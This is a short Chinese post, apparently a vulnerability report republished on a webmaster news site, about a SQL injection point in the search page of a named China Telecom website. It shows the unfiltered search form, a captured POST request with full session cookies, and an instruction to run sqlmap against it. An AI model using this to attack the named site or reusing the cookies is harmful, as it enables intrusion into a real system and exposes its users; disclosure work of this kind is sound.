中国电信互联星空某站SQL注入漏洞下载

中国电信互联星空某站SQL注入漏洞

注入点:http://v.sn.vnet.cn/search/list.jsp

搜索的地方没进行过滤。
 

进行抓包。

POST /search/list.jsp HTTP/1.1

Host: v.sn.vnet.cn

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:28.0) Gecko/20100101 Firefox/28.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: http://v.sn.vnet.cn/search/list.jsp

Cookie: NewLogin=35040012$c+WOKXs39d6H5APnQvhzZfpBn7SI5fUNxTxt+JfNY3KkrbjB1ekxiE3Ag7rdmQhHwNYy8tdFilxcp/DuFGJ0rinH2MCmjVeXaNU2Jz1Sw9p/VPwEMGuW+RZsfJtl6oDCq1WtLUCtwkixxg+Mmcvm0ivbB2RHE0GlKP9dX13C41DZdOmPEudjRCAM1Wo6QgdDUvKLjFcQNsIcF6bpItrwcg==; VNETCENTER_USER_VALIDATOR_SP=nMMrOvGAQ/vttiIDcQfc9Ad7t1BBZ3/yB6W4FflOggQ=; lzstat_uv=215774239994086562|2710605; lzstat_ss=2607815262_1_1402949095_2710605; JSESSIONID=9DDFD4BC8C443085B93DC131F8341B9E

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 134



HistoryString=&QueryAction=%23Search&keyword=1111111&optionKey=1&x=19&y=12&orderByIndex=0&redirPageNo1=1&orderByIndex=0&redirPageNo2=1



拿SLQMAP进行跑

当前位置:站长啦网站目录 » 站长资讯 » 站长新闻 » 漏洞预警 » 文章详细